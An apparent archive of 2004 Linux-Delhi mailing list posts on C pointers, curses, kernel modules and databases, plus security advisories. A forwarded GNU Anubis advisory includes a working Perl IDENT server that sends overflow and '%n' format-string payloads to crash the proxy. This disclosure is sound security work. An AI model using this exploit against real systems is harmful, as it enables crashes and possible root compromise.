Re: [ilugd] Re: strcpy local variable in c
On Thu, 2004-03-04 at 15:38, Vikas Upadhyay wrote: From: Abhijit Menon-Sen [EMAIL PROTECTED] At 2004-03-04 12:24:25 +0530, [EMAIL PROTECTED] wrote: According to me, as we have string as local variable, it should vanish. But, i am still able to return and print the string hello world. Returning a pointer to local variables is undefined; that is, there is no guarantee whatsoever about its behaviour. In particular, it doesn't need to vanish (but it may). By vanish I mean, function gone it's data gone. Each function data (unless got through malloc or defined static) is put on it's stack frame, so when function returns the stack frame is popped out. So local variable no more exists !!! Very true when the function returns the stack is emptied and all local variables are deleted. But the pointer is made on the heap not the stack!So you will have to delete the pointer manually. You are taking control away from the compiler and telling it that you are implementing it manually by making a pointer. So if there was a Garbage Collector this is what it would collect. Otherwise like in this case you have a memory leak. So your code works only by accident. I'm surprised that gcc's warnings are defeated by your intermediate assignment (ptr = string), but only a little. This has been my understading, but now the problem is - if all what i know is correct, yaar yeh kaam kyon kar raha hae. I have tried it so many times ... but if it's just coincidence, what a beautiful coincidence:-) As far as gcc warning for ptr=string goes it is not complaining since string is an array and string actually contains the memory address of starting of the array. So since you are assigning address string to ptr it is not complaining and happily proceeding. Try adding these two statements and changing your foo() function char * foo() { char string[200]; char * ptr=NULL; strcpy(string,hello world); printf(StrAddr=%x\n,string[0]); // Print address of the starting // of the string ptr=string; printf(PtrAddr=%x\n,ptr); //Print the address of the ptr //not the contents } As you will see the above two values are equal. Regards, -- Arindam Dey The mind is not a vessel to be filled but a fire to be kindled. GPG FPR: B8E3 219E F129 F970 F4A7 BC50 9636 504A BEDF 5739 ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
RE: [ilugd] strcpy local variable in c
Hi, Try this code. Hope you understand the difference now. Regards, Venky #include stdio.h #include string.h char * foo(); char * foo1(); int main() { char string[200]; char *p; p = foo(); foo1(); strcpy(string,p); printf(String=%s\n,string); return 0; } char * foo() { char string[200]; char * ptr=NULL; strcpy(string,hello world); ptr=string; return ptr; } char * foo1() { char string[200]; char * ptr=NULL; strcpy(string,cruel world); ptr=string; return ptr; } [EMAIL PROTECTED] dvenkat]$ gcc -Wall strcp.c [EMAIL PROTECTED] dvenkat]$ ./a.out String=cruel world [EMAIL PROTECTED] dvenkat]$ _ My brain is divided into two parts, LEFT and RIGHT, The LEFT has nothing RIGHT in it, And the RIGHT has nothing LEFT in it. _ -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Vikas Upadhyay Sent: Thursday, March 04, 2004 12:24 PM To: [EMAIL PROTECTED] Subject: [ilugd] strcpy local variable in c Hi all, I just want to know, why does this C code work? #include stdio.h #include string.h char * foo(); int main() { char string[200]; strcpy(string,foo()); printf(String=%s\n,string); return 0; } char * foo() { char string[200]; char * ptr=NULL; strcpy(string,hello world); ptr=string; return ptr; } According to me, as we have string as local variable, it should vanish. But, i am still able to return and print the string hello world. When I change to : char string[200]=hello world; and do not use strcpy(), It shows junk, the behaviour is as per my expectations. Does it has got something to do with the implementation of strcpy()? So, does it mean that, in case of Windows it might behave differently? Hope to get some help. Thanks in advance. vikas ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/ ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
Re: [ilugd] Re: strcpy local variable in c
On Thu, 2004-03-04 at 16:07, Arindam Dey wrote: Try adding these two statements and changing your foo() function char * foo() { char string[200]; char * ptr=NULL; strcpy(string,hello world); printf(StrAddr=%x\n,string[0]); // Print address of the starting// of the string ptr=string; printf(PtrAddr=%x\n,ptr); //Print the address of the ptr //not the contents } Apologies for replying to my own mail. But I or my MUA made a horrendous formatting error for my comment above. The word starting will be after the beginning of the second // comment starter. Although I am pretty sure you will correct my ineptitude automatically there was another reason to reply again. You can use the value of the ptr in the main function although it is a local variable because it is made on the heap and thus although the pointer itself is gone meaning you cannot use ptr-something in main but since you have not cleared or freed the memory location using delete() in the function the value stored in the memory location is still present and thus the printf statement in the main is happily printing whatever is stored in that particular memory location. Since the variable string in main has been assigned the memory location or address earlier being used by the ptr in the function foo. Regards, -- Arindam Dey The mind is not a vessel to be filled but a fire to be kindled. GPG FPR: B8E3 219E F129 F970 F4A7 BC50 9636 504A BEDF 5739 ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
Re: [ilugd] tutorials on curses
harsh sharma wrote: can anyone of u please send me the usefule links or any matter related to learning curses i do not have any idea about them...so i have to start from the beginning.. Check the `/usr/share/doc/ncurses-devel-5.3/` directory. You will find enough documentation there to get you started. You should do a thorough research before posting a question. If folks think you have not even tried the obvious step of reading the docs applicable to your problem, they are likely to become annoyed. Here are a few tips : * Read the man and info pages. Most man and info pages have a `bugs' section. See if that applies to your case. * Read the program documentation (usually found in `/usr/doc/program_name' or `/usr/share/doc/program_name') HTH -- \°°/ (oo) +ooO-- -Ooo-+ |Raj Shekhar |My home: | |System Administrator|http://geocities.com/lunatech3007 | |Media Web India |My blog: | |http://www.netphotograph.com|http://lunatech.journalspace.com | +---+ |__|__| || || ooO Ooo ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
[ilugd] Re: strcpy local variable in c
At 2004-03-04 16:07:16 +0800, [EMAIL PROTECTED] wrote: Very true when the function returns the stack is emptied and all local variables are deleted. That's not true, and it's a very misleading way of thinking about this situation. Yes, automatic variables (as C calls them) are allocated on the stack, and are not visible outside their defining lexical scope. But when the function returns, neither is the stack emptied, nor are automatic variables deleted. The variables just cease to be visible, but this is not as a result of some active intervention by the system or compiler. There is no deleting happening (in C, anyway; in C++, destructors get called on scope exit). I mention this in particular because the stack is usually _not_ emptied. The stack pointer is moved, but whatever was on the stack is usually not disturbed. It's no longer on the stack, but that's by definition, not by any explicit destruction. (This is why automatic variables in C have to be initialised before use. When they're created on the stack, there is no way of telling what might have been there before.) But the pointer is made on the heap not the stack! So you will have to delete the pointer manually. That's not true either, in this case the char * ptr is also automatic. Furthermore, returning it would not cause a memory leak (since there is no malloc() allocation happening). ptr=string; printf(PtrAddr=%x\n,ptr); //Print the address of the ptr //not the contents } As you will see the above two values are equal. Of course the two values are equal. That's not the point. The point is that returning the address of an automatic variable is incorrect, and the compiler should warn about such things. If you do return string, gcc does warn you, but I expect detecting ptr=string; return ptr is too expensive, or opens up too many hard-to-detect equivalents. -- ams ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
[ilugd] Re: strcpy local variable in c
At 2004-03-04 13:22:02 +0530, [EMAIL PROTECTED] wrote: *No* valid assumptions can be made with respect to undefined behaviour. You cannot even expect it to not work. Oh, and just as an illustration of what this means, according to the C standard, the behaviour of #pragma is implementation defined. So GCC used to start nethack. (No longer, though. It's been #ifdef'd out for many years, and I think the code is finally gone now.) -- ams ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
Re: [ilugd] Re: tutorials on curses
Hey, if you guys are interesting in snake-charmers, poisonous curses and stuff try out curses with pythons: http://www.amk.ca/python/howto/curses/ http://www-106.ibm.com/developerworks/linux/library/l-python6.html?dwzone=linux I dont know what exactly our good friend wanted to do with curses, but you could probably get more mileage using a scripting lingo like python/perl with curses. While i am at it, Java has pretty poor curses support (one of my pet peeves). Date: Thu, 04 Mar 2004 13:39:51 +0800 From: Arindam Dey [EMAIL PROTECTED] Subject: Re: [ilugd] tutorials on curses On Thu, 2004-03-04 at 13:16, vivek khurana wrote: http://www.themystica.com/mystica/articles/c/curses.html never to be found again. now thanks to Mr. Dey, i again have access to vast amount of information on occult, mysticism, magical paranormal stuff. in fact i should thank Mr. Dey for that ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
Re: [ilugd] Re: strcpy local variable in c
Very true when the function returns the stack is emptied and all local variables are deleted. But the pointer is made on the heap not the stack!So you will have to delete the pointer manually. You are taking control away from the compiler and telling it that you are implementing it manually by making a pointer. So if there was a Garbage Collector this is what it would collect. Otherwise like in this case you have a memory leak. Do you mean a variable declared pointer is declared space on heap ?? Well as per my information, when a pointer is created it being a variable is created on stack (as it's a local variable). But the if memory is assigned to it through malloc (or through it's brother/sister) the memory is allocated on heap. So the variable, even though it's declared a pointer will cease to exist once the function is returned - so no memory leak in this case. Still I am not 100% sure about what I have said, but when I tried to print the *address* of a pointer (local to a function), and address of other variable (not a pointer) I saw two addresses close to each other (variable - 0xb8dc pointer - 0xb8e0). So your code works only by accident. I'm surprised that gcc's warnings are defeated by your intermediate assignment (ptr = string), but only As far as gcc warning for ptr=string goes it is not complaining since string is an array and string actually contains the memory address of starting of the array. So since you are assigning address string to ptr it is not complaining and happily proceeding. Yes, I agree that ther should not be any warning at all. I got confused because when one directly tries to return address of local variable, gcc complains. I really mixed up two. thanx. Still frnds, I am not very clear !!! regards, vikas ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
Re: [ilugd] Re: strcpy local variable in c
On Thu, 2004-03-04 at 16:56, Abhijit Menon-Sen wrote: [snipped some excellent discourse by AMS] Thank you very much for clearing that up. I was pretty mistaken about the stack and heap thing. I had totally forgotten about the malloc thing have been using new and delete for quite a while now :-). Looks like should open the books again. Regards, -- Arindam Dey The mind is not a vessel to be filled but a fire to be kindled. GPG FPR: B8E3 219E F129 F970 F4A7 BC50 9636 504A BEDF 5739 ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
RE: [ilugd] Re: strcpy local variable in c
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] lhi.org]On Behalf Of Vikas Upadhyay Sent: Thursday, March 04, 2004 2:41 PM To: The Linux-Delhi mailing list Subject: Re: [ilugd] Re: strcpy local variable in c -- snip Still frnds, I am not very clear !!! Its very simple, what GCC did was create a array and put hello world at that memory locations. When you returned, you just returned an address. GCC marked those memory locations as reusable but it wouldn't go to the extent of erasing the memory locations. Why should it, after all C has no garbage collector. And hello world is as much a useless string as any other string sdfhd#afddf. Now when foo1 was called in the program I had sent, you will see that it again used the same memory locations, but this time I had written cruel world. When you are calling printf, p has an address which was returned to it by foo (). It goes to the address and prints the contents there which have now changed to cruel world. To understand it in more detail: Every function has three parts The Prologue The Main body The Epilogue The Prologue stores the Callee Save registers on the stack and sets the PR register. Callee Save registers whose values should not change across the function call. So, the value they contained before you called foo, should be there after foo. In the main body, at the end of it, the compiler ensures that the Register (say R0) which is marked as the return value registers in the ABI for the architecture, contains the return value. So, R0 (for x86) has the return value (that is just an address of string in your case). The Epilogue then starts unwinding the stack so that the Stack Pointer and all the Callee Save registers are brought back to the state in which they were before the function had been called. The last assembly instruction in the Main body is generally the rts instruction which tells the function to return. As far as p = foo () is concerned, the compiler would have generated instructions to set p to the value of R0, thats all. When I called foo1 again, the compiler knew that the memory for the local array string defined in foo is no longer required and it proceeds to give the same memory locations to string in foo1. So, accidentally (or is it, :-)), now those memory locations contain cruel world, which is printed. I would suggest you read the ABI for x86 and take a look at the assembly file generated, and you will find out easily. gcc -g foo.c You could use -fnoschedule-insns2 to disable instruction scheduling. gcc -g -fnoschedule-insns2 foo.c objdump --source --disassemble a.out foo.lst Your dump is in foo.lst. Even if GCC did have a garbage collector, I wonder if it would actually try to erase the locations. After all, as I said earlier, hello world is as much a useless string as any other string sdfhd#afddf (once the function has returned), so why go to the trouble at all? Hope that answers your question. :-) regards, vikas Venky ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
[ilugd] facing problem in putting a kernel module
Hi I am a newbie to kernel module programming I have just written a code as follows Bu whn I run make then it says printk not found and all Looks like some kernel header files are missing Is there anybody who has tried and know how to make it to work /* hello-2.c - Demonstrating the module_init() and module_exit() macros. This is the * preferred over using init_module() and cleanup_module(). */ #include linux/module.h // Needed by all modules #include linux/kernel.h // Needed for KERN_ALERT #include linux/init.h // Needed for the macros static int hello_2_init(void) { printk(KERN_ALERT Hello, world 2\n); return 0; } static void hello_2_exit(void) { printk(KERN_ALERT Goodbye, world 2\n); } module_init(hello_2_init); module_exit(hello_2_exit); here is the makefile TARGET := hello-2 WARN := -W -Wall -Wstrict-prototypes -Wmissing-prototypes INCLUDE := -isystem /lib/modules/`uname -r`/build/include CFLAGS := -O2 -DMODULE -D__KERNEL__ ${WARN} ${INCLUDE} CC := gcc-3.0 ${TARGET}.o: ${TARGET}.c .PHONY: clean clean: rm -rf {TARGET}.o Confidentiality Notice The information contained in this electronic message and any attachments to this message are intended for the exclusive use of the addressee(s) and may contain confidential or privileged information. If you are not the intended recipient, please notify the sender at Wipro or [EMAIL PROTECTED] immediately and destroy all copies of this message and any attachments. ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
Re: [ilugd] facing problem in putting a kernel module
Hi I am a newbie to kernel module programming me too ;-) here is the makefile CFLAGS := -O2 -DMODULE -D__KERNEL__ ${WARN} ${INCLUDE} add '-c' to this line as you want an elf object file not an elf executable. ${TARGET}.o: ${TARGET}.c alternately change above to /* use (GCC) not {GCC} (better this way)*/ .o: $(GCC) ${CFLAGS} -c $^.c regards samveen man (n). life support system for a c**k ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
[ilugd] Re: facing problem in putting a kernel module
[EMAIL PROTECTED] wrote: Bu whn I run make then it says printk not found and all Looks like some kernel header files are missing Is there anybody who has tried and know how to make it to work From your Makefile INCLUDE:=-isystem /lib/modules/`uname -r`/build/include Does this directory exist. What is the output of #ls /lib/modules/`uname -r`/build/include Have you got the kernel sources+headers installed. -Tarun ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
[ilugd] [Weird] Postgresql vs Oracle
Hi! Everyone This is a slightly weird question. I am having this debate with a friend of mine. We can't reach conclusion so i am bring it to this platform Q Which is a better DB for serving enterprise needs Postgresql or Oracle (comaprision in terms of support, cost, platform independence, deployment in critical situations etc.) with regards vivek = # # ### # # # # # # Linux##v## Rules! ## vvv ## # ## ## ## ### ### +++# ##++ ++# #++ +++# #+++ +###+ +++ +++ Message void if penguin violated Don't mess with the penguin Disclamer The facts expressed here belong to everybody, the opinions to me. The distinction is yours to draw... __ Do you Yahoo!? Yahoo! Search - Find what youre looking for faster http://search.yahoo.com ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
[ilugd] Linux software + acctg proj
[Bouncing at Sanjay's request, with editing. Anyone in a position to help him out with the CDs and software he needs? -- Raju] Dear Raj Going ahead from LinuxAsia, I'm trying to set up some demo Linux at a client's office in Rajasthan and need to get some software - details below. (There's a Linux geek from Ireland who is visiting there and he would be doing the technical stuff.) SOFTWARE NEEDS Mandrake 9.0 or higher preferably 9.2 -- 3cd installation set CD of Mandrake updates to 9.0 -- if possible OOo 1.1 for Win and Linux Adabas LTSP client and server Tight VNC for windows. Koha 2.0 in RPM or preferably latest version in .tar.gz of 2.0rc4 Hindi OO - I am really keen on this, tried getting it installed by the CDAC people but there are problems with the font installation still, after some emails back and forth with them. Have you had any better luck? Or anybody else? (I already have Bhartiya) Going out tomorrow afternoon for a few days, back sunday evening for a couple of days, then off to Rajasthan Tuesday evening... do you think we can get this organised between monday and tuesday? sanjay Sanjay Kumar 8/9 Sarvapriya Vihar, New Delhi 110016 Phone: +(91-11) (Off) + 2652 7605; (Res:) + 2612 1911 ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
[ilugd] Online Programming Contest notification
Hello all, We are students from Department of CSE, Thiagarajar college of Engineering, Madurai, Tamil Nadu, India. We are conducting an online programming contest as part out National level technical symposium (Cyber 2004) on 7th March. We welcome people who are interested in programming to participate in this event. Please send this mail to your mailing list. To register in this event http://www.cyber-tce.org/ProgramRegister.html For further details : http://www.cyber-tce.org (Cyber 2004 home page) Thanking You, Cyber 04 Crew. - Do you Yahoo!? Get better spam protection with Yahoo! Mail ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
Re: [ilugd] How do I record LPs using a Linux Box?
as i understand it, you want your LP's converted to something digital... the answer is simple... irrespective of which OS you use... what you need to do is tap into the output of the player, and put that into the Line In port of your soundcard. There are several ways of doing this. You can look for a headphone jack on the player, and use the output from that to go to the line in. All you need is a wire with the convenient jacks. The jacks are easily available at your tv/auido repair shops. Your sound card will require a headphone jack ( the kind that fits into most walkmans/discmans)... I cant say with any degree of certainty what our player output will be like. There are other ways of getting around this if your player does not have a headphone jack... look for AUX out's... typical R1R2 cables will be able to give you the input on the comp. this is actually a better method of getting the sound in as you're going to be getting it in stereo. If you ever connected your deck to your comp. just reverse the process... put output jack you use from the comp. into the line in (of the comp. ) and the input ends of the deck (RCA jacks) into the AUX out of the Record player There are several sound recorders available for linux, and they can record in several formats including MP3. If you're looking at sound quality (quality will vary on the quality of the LP being recorded and the method you use to record it...) then choose bitrates in excess of 192Kbps. For the software bit check out the following link... http://www.ibiblio.org/pub/Linux/apps/sound/recorders/ Keep in mind what you said about the beer... :) Aman --- Ashwin Baindur [EMAIL PROTECTED] wrote: Dear all, I´ve got a stackful of LPs. Irreplacable to me. I want to record them, myself. I´ve got a Comp with Red Hat 8.0, a borrowed laptop with Mandrake 9.2 and a Record Plater (currently in disrepair). Can anyone tell me what hardware and software I need? Yes, I am googling and I am starting to go through the chaff. If anyone know how, would really appreciate his help in putting it up. Free beer promised during sessions. Thanx in advance, AshLin ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/ __ Do you Yahoo!? Yahoo! Search - Find what youre looking for faster http://search.yahoo.com ___ ilugd mailinglist -- [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd Archives at: http://news.gmane.org/gmane.user-groups.linux.delhi http://www.mail-archive.com/[EMAIL PROTECTED]/
[ilugd] (fwd) [SECURITY] [DSA 455-1] New libxml packages fix arbitrary code execution
[Please upgrade if you have libxml or libxml2 installed -- Raju] This is an RFC 1153 digest. (1 message) -- Message-Id: [EMAIL PROTECTED] From: [EMAIL PROTECTED] (Martin Schulze) To: [EMAIL PROTECTED] Subject: [SECURITY] [DSA 455-1] New libxml packages fix arbitrary code execution Date: Thu, 4 Mar 2004 11:22:56 +0100 (CET) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 455-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze March 3rd, 2004 http://www.debian.org/security/faq - -- Package: libxml, libxml2 Vulnerability : buffer overflows Problem-Type : remote Debian-specific: no CVE ID : CAN-2004-0110 libxml2 is a library for manipulating XML files. Yuuichi Teranishi discovered a flaw in libxml, the GNOME XML library. When fetching a remote resource via FTP or HTTP, the library uses special parsing routines which can overflow a buffer if passed a very long URL. If an attacker is able to find an application using libxml1 or libxml2 that parses remote resources and allows the attacker to craft the URL, then this flaw could be used to execute arbitrary code. For the stable distribution (woody) this problem has been fixed in version 1.8.17-2woody1 of libxml and version 2.4.19-4woody1 of libxml2. For the unstable distribution (sid) this problem has been fixed in version 1.8.17-5 of libxml and version 2.6.6-1 of libxml2. We recommend that you upgrade your libxml1 and libxml2 packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17-2woody1.dsc Size/MD5 checksum: 651 16512f774479d73b7d82ca4e1db527f5 http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17-2woody1.diff.gz Size/MD5 checksum:33976 68afef27edf44d2b81e02fde3431bca8 http://security.debian.org/pool/updates/main/libx/libxml/libxml_1.8.17.orig.tar.gz Size/MD5 checksum: 1016403 b8f01e43e1e03dec37dfd6b4507a9568 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1.dsc Size/MD5 checksum: 654 6f56380f9bfade2c66f03956e1a65162 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1.diff.gz Size/MD5 checksum: 344358 ba3ea49cc8c465ff1a6377780c35a45d http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19.orig.tar.gz Size/MD5 checksum: 1925487 22e3c043f57e18baaed86c5fff3eafbc Alpha architecture: http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_alpha.deb Size/MD5 checksum: 381994 dc3ada5391f52bdfd642df1bc5b9a6be http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_alpha.deb Size/MD5 checksum: 208830 a0698c267c722bf5127ee3709024ecc9 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_alpha.deb Size/MD5 checksum: 388786 a4ece19b65c46dd0e8f889c26e5938b3 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_alpha.deb Size/MD5 checksum: 938568 5f3e46bd132c9167db9e93ca3c739952 ARM architecture: http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_arm.deb Size/MD5 checksum: 392536 9e126158928d24a562ae1d2b3d35ae1d http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_arm.deb Size/MD5 checksum: 184172 0527fd6a14e003139be9b475e689ee41 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.4.19-4woody1_arm.deb Size/MD5 checksum: 346060 6b9caeac9a0061576f8a1e5b46ed8671 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.4.19-4woody1_arm.deb Size/MD5 checksum: 902966 688fb8c5ea18b0f9d8e7671dad5426c5 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/libx/libxml/libxml-dev_1.8.17-2woody1_i386.deb Size/MD5 checksum: 330042 b1c61849e10edbe597429fcd05d1d2b3 http://security.debian.org/pool/updates/main/libx/libxml/libxml1_1.8.17-2woody1_i386.deb Size/MD5 checksum: 183310 3c217f980c138f24eac1a0abd89eba78
[ilugd] (fwd) GNU Anubis buffer overflows and format string bugs
[Please upgrade if you use GNU Anubis. Binary-encoded exploit snipped -- Raju] This is an RFC 1153 digest. (1 message) -- Message-ID: [EMAIL PROTECTED] From: Ulf =?iso-8859-1?b?SORybmhhbW1hcg==?= [EMAIL PROTECTED] Sender: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] GNU Anubis buffer overflows and format string bugs Date: Thu, 4 Mar 2004 20:19:40 +0100 GNU Anubis buffer overflows and format string bugs PROGRAM: GNU Anubis VENDOR: Free Software Foundation, Inc. HOMEPAGE: http://www.gnu.org/software/anubis/ VULNERABLE VERSIONS: 3.6.2, 3.9.93, 3.9.92, 3.6.0, 3.6.1, possibly others IMMUNE VERSIONS: 3.6.2 with vendor patch, 3.9.93 with vendor patch, latest CVS REFERENCES: not yet * DESCRIPTION * GNU Anubis is an outgoing mail processor. It goes between the MUA (Mail User Agent) and the MTA (Mail Transport Agent), and can perform various sorts of processing and conversion on-the-fly in accordance with the sender's specified rules, based on a highly configurable regular expressions system. It operates as a proxy server, and can edit outgoing mail headers, encrypt or sign mail with the GnuPG, build secure SMTP tunnels using the TLS/SSL encryption even if your mail user agent doesn't support it, or tunnel a connection through a SOCKS proxy server. (quoted from freshmeat.net) * SUMMARY * I have found two buffer overflows and three format string bugs in GNU Anubis. They can all be remotely exploited, potentially to get root access, as GNU Anubis usually runs as root and drops its privileges after executing some of the vulnerable functions. * TECHNICAL DETAILS * a) There are two buffer overflows in the function auth_ident() in auth.c. The overflows are caused by sscanf() format strings of the type %s instead of %63s. b) There are format string bugs in three instances of the syslog() call. They are located in the function info() in log.c, the function anubis_error() in errs.c and the function ssl_error() in ssl.c. The vulnerable functions take strings partially made up of user-supplied data, and use them as the format string instead of using them as parameters ('syslog(priority, string);' instead of 'syslog(priority, %s, string);'). These format string bugs become a bigger problem if you set termlevel to VERBOSE or DEBUG, as GNU Anubis then will log more data with the syslog() facility. * SOLUTION * The vendor has released official security patches for 3.6.2 and 3.9.93. They can be downloaded from the program's homepage. They correct both the buffer overflows and the format string bugs. * MALICIOUS IDENT SERVER * One of the methods of attacking GNU Anubis is through IDENT data, as it always connects to the client's IDENT server to get more information about the client. I wrote a simple malicious IDENT server in Perl. It crashes the current instance of GNU Anubis, either by using the buffer overflows or by using the format string bugs. Here it is: #!/usr/bin/perl -- # anubis-crasher # Ulf Harnhammar 2004 # I hereby place this program in the Public Domain. use IO::Socket; sub usage() { die usage: $0 type\n. type is 'a' (buffer overflow) or 'b' (format string bug).\n; } # sub usage $port =3D 113; usage() unless @ARGV =3D=3D 1; $type =3D shift; usage() unless $type =3D~ m|^[ab]$|; $send{'a'} =3D 'U' x 400; $send{'b'} =3D '%n' x 28; $sendstr =3D $send{$type}; $server =3D IO::Socket::INET-new(Proto =3D 'tcp', LocalPort =3D $port, Listen =3D SOMAXCONN, Reuse =3D 1) or die can't create server: $!; while ($client =3D $server-accept()) { $client-autoflush(1); print got a connection\n; $input =3D $client; $input =3D~ tr/\015\012//d; print client said $input\n; # $wait =3D STDIN; # $wait =3D 'be quiet, perl -wc'; $output =3D a: USERID: a:$sendstr; print $client $output\n; print I said $output\n; close $client; print disconnected\n; } # while client=3Dserver-accept __END__ * 31337 IRC KIDDIES * K: w0w d00d m0r3 buphph3r 0v3rphl0wzZz 4nd ph0rm4t zZztr1ngzZz!!1! but why d0 y4 p0zZzt 4b0ut th4t xss ph1lt3r??+??+? w3 1n 'h4ck3rzZz phr0m h3ll' r n0t 4muzZz3d!! xss 1zZzn't r34lly 4 vuln3r4b1l1ty c0z 1t'zZz 34zZzy t0 3xpl01t th4t vuln3r4b1l1ty 4nd th3n u c4n't pr00v3 h0w 31337 u r!!! th3 n31ghb0ur'zZz d4ught3r 1zZz r34lly cut3 4nd 1ph 1 ph1nd l0tzZz 0ph buphph3r 0v3rphl0wzZz zZzh3'll b3 1mpr3zZzZzZ3d 4nd g0 t0 th3 m0v13zZz w1th m3 but th4t w0n't h4pp3n 1ph 1 ph1nd xss h0l3zZz11!!!1!!11 U: Virgin. (Anyone on IRC who doesn't behave like K here is of course OK.) // Ulf Harnhammar kses - 31337 PHP HTML/XHTML filter (no XSS) http://sourceforge.net/projects/kses ___ Full-Disclosure - We believe in it. Charter:
[ilugd] (fwd) Abobe Reader 5.1 XFDF Buffer Overflow Vulnerability
